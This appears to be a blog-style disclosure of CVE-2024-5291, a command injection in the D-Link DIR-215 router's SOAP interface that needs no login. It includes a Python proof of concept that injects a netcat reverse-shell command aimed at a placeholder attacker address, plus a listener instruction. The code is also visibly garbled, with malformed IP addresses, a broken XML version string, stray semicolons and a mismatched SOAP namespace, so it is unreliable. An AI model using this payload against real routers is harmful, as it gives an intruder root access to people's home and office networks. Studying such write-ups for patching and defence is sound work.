A critical vulnerability, CVE-2024-5291, has been discovered in the popular D-Link DIR-215 Wi-Fi router. This flaw allows attackers on the same network—or anyone able to reach the router’s web interface—to run their own commands as root. More troubling: No login is required.
In this exclusive report, we’ll break down how this vulnerability works, demonstrate real-world exploitation, and share resources for learning more or defending your device.
Background
The D-Link DIR-215 is a mid-range consumer Wi-Fi router found in homes and small offices. Like many routers, it hosts a web interface that users can access to manage device settings.
The SOAP API Flaw
The router exposes a SOAP API service on TCP port 80 (the default HTTP port). This service includes an unauthenticated endpoint, GetDeviceSettings, intended for remote management. The flaw lies in how the service processes data handed over in incoming requests.
What goes wrong:
The router passes a certain string value from the SOAP request directly to a system shell command without proper sanitization or validation. This means that if an attacker carefully crafts their request, they can inject arbitrary operating system commands.
Summary
- Component affected: SOAP API (/soap/server_sa/)
Vulnerable method: GetDeviceSettings
- Port: 80/tcp (HTTP)
Vulnerable Code Path
The flaw specifically resides in the way GetDeviceSettings handles incoming user-supplied data within the SOAP body. Here’s a generic pseudo-snippet (as vendor sources aren’t public):
// This is a simplified illustration; actual code is closed source
char buffer[128];
snprintf(buffer, sizeof(buffer), "config-cmd %s", user_supplied_string);
system(buffer); // Dangerous: No input sanitization!
Crafting the Exploit
To exploit this, an attacker sends a specially-crafted SOAP POST request to the router’s /soap/server_sa/ endpoint.
Here is a Python proof-of-concept (PoC) showing how to launch a harmless test command (like ping) or a malicious one (like opening a reverse shell):
import requests
target = "http://192.168..1/soap/server_sa/";
headers = {
"Content-Type": "text/xml; charset=utf-8",
"SOAPAction": "\"http://purenetworks.com/HNAP1/GetDeviceSettings\"";,
}
# Payload: injects a command after a semicolon
cmd = "127...1; nc -e /bin/sh ATTACKER_IP 1234" # Replace ATTACKER_IP and port
xml_data = f"""<?xml version="1." encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">;
<SOAP-ENV:Body>
<GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">;
<DeviceName>{cmd}</DeviceName>
</GetDeviceSettings>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
r = requests.post(target, headers=headers, data=xml_data)
print(f"HTTP {r.status_code}")
print(r.text)
Replace ATTACKER_IP with your real IP where you’re listening for the reverse shell (e.g., with nc -lvnp 1234).
How This Works
- The vulnerable router takes the value of <DeviceName>, combines it into a shell command, and runs it.
- By adding ; (a shell command separator) and an extra command, attackers can run whatever they want.
References
- ZDI Advisory: ZDI-24-686
- NIST NVD Entry
- CVE Details
- Vendor Page (D-Link DIR-215)
Remediation and Protection
- Check for Firmware Updates: D-Link may release updated firmware—see D-Link support.
- Restrict Access: Do not expose web management to the internet. Restrict configuration access to trusted devices.
Conclusion
CVE-2024-5291 highlights the dangers of improper input validation in embedded device software. Because this flaw allows for unauthenticated, remote root access, patching and protection should be a priority for anyone using the D-Link DIR-215.
If you’re a user, update your firmware and secure your router interface. If you’re a researcher, check out the above links and responsibly report similar bugs to vendors.
Stay safe—and always keep your hardware updated!
Disclaimer: This information is provided for educational purposes only. Do not attempt to exploit devices without authorization.
Timeline
Published on: 05/23/2024 22:15:14 UTC
Last modified on: 05/24/2024 01:15:30 UTC